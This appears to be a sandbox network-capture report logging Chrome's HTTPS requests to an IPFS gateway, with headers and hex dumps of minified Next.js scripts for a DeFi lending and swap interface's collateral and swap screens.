                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 65 3f 64 65 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 65 2c 79 65 3d 28 30 2c 79 2e 68 45 29 28 6d 65 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 74 2e 70 72 69 63 65 49 6e 55 53 44 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 62 65 3d 64 65 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 74 2e 70 72 69 63 65 49 6e 55 53 44 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 31 30 30 2b 4e 75 6d 62 65 72 28 73 65 29 29 2e 64 69 76 69 64 65 64 42 79 28 31 30 30 29 2e 64 69 76 69 64 65 64 42 79 28 6c 65 2e 70 72 69 63 65 49 6e 55 53 44 29 2c 66 65 3d 51 28 51 28 7b 7d 2c 6c 65 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 4a 7d 29 2c 76 65 3d 51 28 51 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 75 65 2e 63 75 72 72 65 6e 74 7d 29 3b 22 65 78 61 63 74 49 6e 22 3d 3d 3d 65 65
                                                                                                                                                                                                                                                  Data Ascii: e?de.toString():ne,ye=(0,y.hE)(me).multipliedBy(t.priceInUSD).toString(),be=de.multipliedBy(t.priceInUSD).multipliedBy(100+Number(se)).dividedBy(100).dividedBy(le.priceInUSD),fe=Q(Q({},le),{},{amount:J}),ve=Q(Q({},t),{},{amount:ue.current});"exactIn"===ee
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3d 28 30 2c 77 2e 5a 29 28 50 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 2c 72 3b 72 65 74 75 72 6e 20 50 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 5a 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 26 26 4e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 26 26 28 22 65 78 61 63 74 49 6e 22 21 3d 3d 6c 7c 7c 5a 2e 61 6d 6f 75 6e 74 26 26 22 30 22 21 3d 3d 5a 2e 61 6d 6f 75 6e 74 26 26 21 69 73 4e 61 4e 28 2b 5a 2e 61 6d 6f 75 6e 74 29 29 26 26 28 22 65 78 61 63 74 4f 75 74 22 21 3d 3d 6c 7c 7c 4e 2e 61 6d 6f 75 6e 74 26 26 22 30 22 21 3d 3d 4e 2e 61 6d 6f 75 6e 74 26 26 21 69 73 4e
                                                                                                                                                                                                                                                  Data Ascii: =(0,w.Z)(P().mark((function e(){var t,r;return P().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:if(Z.underlyingAsset&&N.underlyingAsset&&("exactIn"!==l||Z.amount&&"0"!==Z.amount&&!isNaN(+Z.amount))&&("exactOut"!==l||N.amount&&"0"!==N.amount&&!isN
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 28 22 72 65 74 75 72 6e 22 2c 28 30 2c 4f 2e 78 53 29 28 54 2c 73 2c 69 2c 74 2c 75 2c 6e 29 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 65 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 28 30 2c 4f 2e 5f 6e 29 28 54 2c 73 2c 69 2c 74 2c 75 2c 6e 29 29 3b 63 61 73 65 20 37 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 7d 7d 28 7b 63 68 61 69 6e 49 64 3a 48 2e 75 6e 64 65 72 6c 79 69 6e 67 43 68 61 69 6e 49 64 7c 7c 59 2c 75 73 65 72 41 64 64 72 65 73 73 3a 71 2c 73 77 61 70 56 61 72 69 61 6e 74 3a 65 65 2c 73 77 61 70 49 6e 3a 66
                                                                                                                                                                                                                                                  Data Ascii: ("return",(0,O.xS)(T,s,i,t,u,n));case 6:return e.abrupt("return",(0,O._n)(T,s,i,t,u,n));case 7:case"end":return e.stop()}}),e)})));return function(){return e.apply(this,arguments)}}()}}({chainId:H.underlyingChainId||Y,userAddress:q,swapVariant:ee,swapIn:f


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.549733209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/9671.96a31e2ffa610a87.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 16384
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreic4k6khgb2vj6wsuh5crijjd757ckchdsm7hcycynb6fmid666uba"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9671.96a31e2ffa610a87.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreic4k6khgb2vj6wsuh5crijjd757ckchdsm7hcycynb6fmid666uba
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028475
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 30 65 62 39 64 34 33 32 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e410eb9d432c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 37 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 74 28 36 34 39 33 38 29 29 2c 73 3d 74 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9671],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 72 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[r.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 74 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 73 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 72 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 68 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 72 29 3d 3e 5b 72 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 72 7d 29 3d 3e 7b 6c 65 74 20 74 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return t.reduce(((e,n,o)=>(e.push(n),o<t.length-1&&e.push(s.cloneElement(r,{key:`separator-${o}`})),e)),[])}const h=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,r)=>[r.root]})((({ownerState:e,theme:r})=>{let t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3d 6d 7d 2c 33 34 32 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 43 6f 6c 6c 61 74 65 72 61 6c 43 68 61 6e 67 65 4d 6f 64 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 7d 29 3b 76 61 72 20 6e 2c 6f 3d 74 28 35 39 34 39 39 29 2c 73 3d 74 28 34 39 35 30 31 29 2c 61 3d 28 74 28 36 37 32 39 34 29 2c 74 28 34 37 31 33 30 29 29 2c 69 3d 74 28 38 31 39 35 29 2c 6c 3d 74 28 33 31 39 35 39 29 2c 63 3d 74 28 39 34 36 33 35 29 2c 75 3d 74 28 31 32 37 39 29 2c 64 3d 74 28 32 30 38 35 34 29 2c 76 3d 74 28 32 39 36 33 30 29 2c 70 3d 74 28 36 39 33 33 31 29 2c 66 3d 74 28 34 33 36 32 39 29 2c 68 3d 74 28 36 37 39 31 36 29 2c 6d 3d 74 28 39 33 36 30 38 29 2c 41 3d 74 28 35 37 38 32 34 29 2c 62
                                                                                                                                                                                                                                                  Data Ascii: =m},34204:function(e,r,t){t.r(r),t.d(r,{CollateralChangeModal:function(){return I}});var n,o=t(59499),s=t(49501),a=(t(67294),t(47130)),i=t(8195),l=t(31959),c=t(94635),u=t(1279),d=t(20854),v=t(29630),p=t(69331),f=t(43629),h=t(67916),m=t(93608),A=t(57824),b
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 67 2e 2e 2e 22 7d 29 2c 68 61 6e 64 6c 65 41 63 74 69 6f 6e 3a 63 7d 29 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 3d 30 5d 3d 22 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 22 2c 65 5b 65 2e 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 3d 31 5d 3d 22 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 22 2c 65 5b 65 2e 43 41 4e 5f 4e 4f 54 5f 53 57 49 54 43 48 5f 55 53 41 47 45 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 4d 4f 44
                                                                                                                                                                                                                                                  Data Ascii: g..."}),handleAction:c})};!function(e){e[e.DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY=0]="DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY",e[e.CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL=1]="CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL",e[e.CAN_NOT_SWITCH_USAGE_AS_COLLATERAL_MOD
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 28 22 31 22 29 26 26 28 6b 3d 6e 2e 43 41 4e 5f 4e 4f 54 5f 53 57 49 54 43 48 5f 55 53 41 47 45 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 4d 4f 44 45 29 3b 76 61 72 20 48 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 77 69 74 63 68 28 6b 29 7b 63 61 73 65 20 6e 2e 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 3a 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 73 75 70 70 6c 69 65 73 20 69 6e 20 74 68 69 73 20 63 75 72 72 65 6e 63 79 22 7d 29 3b 63 61 73 65 20 6e 2e 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 3a 72 65 74 75 72 6e 28 30 2c 54 2e 6a
                                                                                                                                                                                                                                                  Data Ascii: ("1")&&(k=n.CAN_NOT_SWITCH_USAGE_AS_COLLATERAL_MODE);var H=function(){switch(k){case n.DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY:return(0,T.jsx)(s.cC,{id:"You do not have supplies in this currency"});case n.CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL:return(0,T.j
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 61 74 69 6f 6e 20 6d 6f 64 65 20 61 6e 64 20 6f 74 68 65 72 20 74 6f 6b 65 6e 73 20 63 61 6e 20 6e 6f 77 20 62 65 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 22 7d 29 7d 29 2c 72 2e 69 73 49 73 6f 6c 61 74 65 64 26 26 79 2e 64 65 74 65 72 6d 69 6e 65 57 61 72 6e 69 6e 67 44 69 73 70 6c 61 79 28 7b 64 65 62 74 43 65 69 6c 69 6e 67 3a 79 7d 29 2c 28 30 2c 54 2e 6a 73 78 73 29 28 41 2e 6d 36 2c 7b 67 61 73 4c 69 6d 69 74 3a 45 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 54 2e 6a 73 78 29 28 41 2e 6f 44 2c 7b 73 79 6d 62 6f 6c 3a 72 2e 73 79 6d 62 6f 6c 2c 69 63 6f 6e 53 79 6d 62 6f 6c 3a 72 2e 69 63 6f 6e 53 79 6d 62 6f 6c 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 28 30 2c 54 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61
                                                                                                                                                                                                                                                  Data Ascii: ation mode and other tokens can now be used as collateral"})}),r.isIsolated&&y.determineWarningDisplay({debtCeiling:y}),(0,T.jsxs)(A.m6,{gasLimit:E,children:[(0,T.jsx)(A.oD,{symbol:r.symbol,iconSymbol:r.iconSymbol,description:(0,T.jsx)(s.cC,{id:"Supply ba
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3a 22 52 65 76 69 65 77 20 74 78 22 7d 29 2c 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 3a 6e 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 63 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 61 2e 58 2c 7b 63 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 4e 2c 52 28 52 28 7b 7d 2c 65 29 2c 7b 7d 2c 7b 75 73 65 72 3a 72 7d 29 29 7d 7d 29 7d 7d 29 7d 29 7d 7d 2c 39 34 36 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 38 30 38 35 34 29 2c 6f 3d 28 74 28 36 37 32 39 34 29 2c 74 28 37 33 39 36 35 29 29 2c
                                                                                                                                                                                                                                                  Data Ascii: :"Review tx"}),underlyingAsset:n.underlyingAsset,children:function(e){return(0,T.jsx)(a.X,{children:function(r){return(0,T.jsx)(N,R(R({},e),{},{user:r}))}})}})})}},94635:function(e,r,t){t.d(r,{A:function(){return A}});var n=t(80854),o=(t(67294),t(73965)),
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 76 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 62 7d 7d 7d 29 2c 5f 28 7b 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 44 2c 6e 61 74 69 76 65 42 61 6c 61 6e 63 65 3a 28 6e 75 6c 6c 3d 3d 3d 28 72 3d 77 5b 6e 2e 68 50 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 61 6d 6f 75 6e 74 29 7c 7c 22 30 22 2c 74 6f 6b 65 6e 42 61 6c 61 6e 63 65 3a 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 77 5b 48 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 61 6d 6f 75 6e 74 29 7c 7c 22 30 22 2c 70 6f 6f 6c 52 65 73 65 72 76 65 3a 48 2c
                                                                                                                                                                                                                                                  Data Ascii: v.vh.SWITCH_NETWORK,eventParams:{asset:b}}}),_({isWrongNetwork:D,nativeBalance:(null===(r=w[n.hP.toLowerCase()])||void 0===r?void 0:r.amount)||"0",tokenBalance:(null===(t=w[H.underlyingAsset.toLowerCase()])||void 0===t?void 0:t.amount)||"0",poolReserve:H,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.549734209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/8882.78d4e9d7872de2c1.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 29637
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreici5wdauqliymghdfd6ou3ifp65gdrlqti2ekwcg7m7mf7j5nvcc4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8882.78d4e9d7872de2c1.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreici5wdauqliymghdfd6ou3ifp65gdrlqti2ekwcg7m7mf7j5nvcc4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 687015
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 30 65 63 63 33 37 63 38 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e410ecc37c8a-EWR
